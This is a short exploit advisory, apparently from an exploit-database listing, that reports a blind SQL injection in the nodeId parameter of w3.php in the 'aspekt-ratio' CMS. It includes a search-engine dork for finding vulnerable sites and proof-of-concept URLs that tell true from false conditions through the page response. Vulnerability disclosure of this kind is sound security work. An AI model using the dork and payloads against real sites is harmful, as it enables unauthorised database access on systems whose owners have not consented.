19 lines
No EOL
591 B
Text
19 lines
No EOL
591 B
Text
# Author: Stephan Sattler // http://www.solidmedia.de
|
|
# Software Website: http://www.meso.net
|
|
# Software Link: http://www.meso.net/aspekt-ratio
|
|
# Dork: inurl:w3.php?nodeId=
|
|
|
|
|
|
[ Vulnerability ]
|
|
|
|
|
|
# Explanation:
|
|
|
|
$_GET["nodeId"] isn't sanitized before executing the database query.
|
|
An attacker can use this for a blind SQL injection attack.
|
|
|
|
|
|
# Exploiting the Vulnerability // PoC:
|
|
|
|
URL: http://[site]/[path]/w3.php?nodeId=8348 and (select 1)=1 - will show the page
|
|
URL: http://[site]/[path]/w3.php?nodeId=8348 and (select 1)=0 - will show an error page by aspect ratio Cms |